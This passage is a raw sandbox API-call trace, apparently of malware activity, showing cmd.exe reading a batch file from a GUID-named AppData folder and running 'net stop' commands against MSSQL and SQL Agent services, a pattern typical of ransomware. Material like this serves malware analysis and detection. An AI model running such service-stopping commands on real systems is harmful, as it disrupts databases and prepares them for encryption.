lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.766] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.766] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$TPSAMA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$TPSAMA /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x870, dwThreadId=0x894)) returned 1 [0209.770] CloseHandle (hObject=0x74) returned 1 [0209.770] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.770] GetProcessHeap () returned 0x3e0000 [0209.770] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.770] GetEnvironmentStringsW () returned 0x3f8408* [0209.770] GetProcessHeap () returned 0x3e0000 [0209.770] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.770] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.770] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0209.919] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.919] CloseHandle (hObject=0x78) returned 1 [0209.919] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.919] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.919] GetProcessHeap () returned 0x3e0000 [0209.919] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.919] GetEnvironmentStringsW () returned 0x3f8408* [0209.920] GetProcessHeap () returned 0x3e0000 [0209.920] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.920] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.920] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.920] GetProcessHeap () returned 0x3e0000 [0209.920] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.920] GetEnvironmentStringsW () returned 0x3f8408* [0209.920] GetProcessHeap () returned 0x3e0000 [0209.920] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.920] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.920] GetProcessHeap () returned 0x3e0000 [0209.920] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.920] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.920] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.921] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.921] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.921] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.921] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.921] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.921] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.921] SetConsoleInputExeNameW () returned 0x1 [0209.921] GetConsoleOutputCP () returned 0x1b5 [0209.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0209.922] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0209.922] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.922] SetFilePointer (in: hFile=0x78, lDistanceToMove=4663, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1237 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.922] GetProcessHeap () returned 0x3e0000 [0209.922] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.923] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.923] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1237 [0209.923] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x68a, lpOverlapped=0x0) returned 1 [0209.923] SetFilePointer (in: hFile=0x78, lDistanceToMove=4702, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x125e [0209.923] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=39, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$CITRIX_METAFRAME /y\r\n /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 39 [0209.923] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.923] GetFileType (hFile=0x78) returned 0x1 [0209.923] _get_osfhandle (_FileHandle=3) returned 0x78 [0209.923] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x125e [0209.923] GetProcessHeap () returned 0x3e0000 [0209.923] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0209.923] GetProcessHeap () returned 0x3e0000 [0209.923] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0209.927] _tell (_FileHandle=3) returned 4702 [0209.927] _close (_FileHandle=3) returned 0 [0209.927] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.927] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.927] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.927] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.927] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.927] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.927] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.927] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.927] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.927] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.927] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.927] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.927] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.927] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.927] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.927] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.927] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.927] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.927] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.927] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.927] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.927] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.927] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.927] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.927] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.927] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.927] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.927] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.927] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.927] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.928] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.928] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.928] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.928] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.928] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.928] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.928] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.928] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.928] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.928] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.928] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.928] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.928] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.928] SetErrorMode (uMode=0x0) returned 0x1 [0209.928] GetProcessHeap () returned 0x3e0000 [0209.928] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.928] GetProcessHeap () returned 0x3e0000 [0209.928] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.929] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.929] GetProcessHeap () returned 0x3e0000 [0209.929] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.929] GetProcessHeap () returned 0x3e0000 [0209.929] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.929] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0209.929] GetProcessHeap () returned 0x3e0000 [0209.929] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.929] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.929] GetProcessHeap () returned 0x3e0000 [0209.929] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.930] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.930] GetProcessHeap () returned 0x3e0000 [0209.930] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.930] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.930] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.931] GetLastError () returned 0x2 [0209.931] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.931] GetLastError () returned 0x2 [0209.931] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.932] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.932] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.932] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.933] GetLastError () returned 0x2 [0209.933] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.933] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.933] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.934] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.934] SetErrorMode (uMode=0x0) returned 0x1 [0209.934] GetProcessHeap () returned 0x3e0000 [0209.934] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.934] GetProcessHeap () returned 0x3e0000 [0209.934] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.934] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.934] GetProcessHeap () returned 0x3e0000 [0209.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.935] GetProcessHeap () returned 0x3e0000 [0209.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.935] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.935] GetProcessHeap () returned 0x3e0000 [0209.935] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.935] GetProcessHeap () returned 0x3e0000 [0209.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.935] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.935] GetProcessHeap () returned 0x3e0000 [0209.935] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.936] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.936] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.936] GetLastError () returned 0x2 [0209.937] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.937] GetLastError () returned 0x2 [0209.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.937] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.938] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.938] GetLastError () returned 0x2 [0209.938] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.939] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.939] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.939] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0209.939] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0209.939] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0209.940] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.940] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$CITRIX_METAFRAME /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$CITRIX_METAFRAME /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$CITRIX_METAFRAME /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x3a0, dwThreadId=0x710)) returned 1 [0209.943] CloseHandle (hObject=0x78) returned 1 [0209.943] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.943] GetProcessHeap () returned 0x3e0000 [0209.943] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.944] GetEnvironmentStringsW () returned 0x3f8408* [0209.944] GetProcessHeap () returned 0x3e0000 [0209.944] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.944] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.944] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0210.071] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0210.072] CloseHandle (hObject=0x74) returned 1 [0210.072] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0210.072] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.072] GetProcessHeap () returned 0x3e0000 [0210.072] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.072] GetEnvironmentStringsW () returned 0x3f8408* [0210.072] GetProcessHeap () returned 0x3e0000 [0210.072] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.072] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.072] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.072] GetProcessHeap () returned 0x3e0000 [0210.072] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.072] GetEnvironmentStringsW () returned 0x3f8408* [0210.072] GetProcessHeap () returned 0x3e0000 [0210.072] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.072] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.073] GetProcessHeap () returned 0x3e0000 [0210.073] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.073] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.073] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.073] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.073] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.073] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.073] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.073] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.073] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.073] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.074] SetConsoleInputExeNameW () returned 0x1 [0210.074] GetConsoleOutputCP () returned 0x1b5 [0210.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.074] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0210.074] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0210.074] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.074] SetFilePointer (in: hFile=0x74, lDistanceToMove=4702, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x125e [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.074] GetProcessHeap () returned 0x3e0000 [0210.074] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.075] GetProcessHeap () returned 0x3e0000 [0210.075] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.075] GetProcessHeap () returned 0x3e0000 [0210.075] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.075] GetProcessHeap () returned 0x3e0000 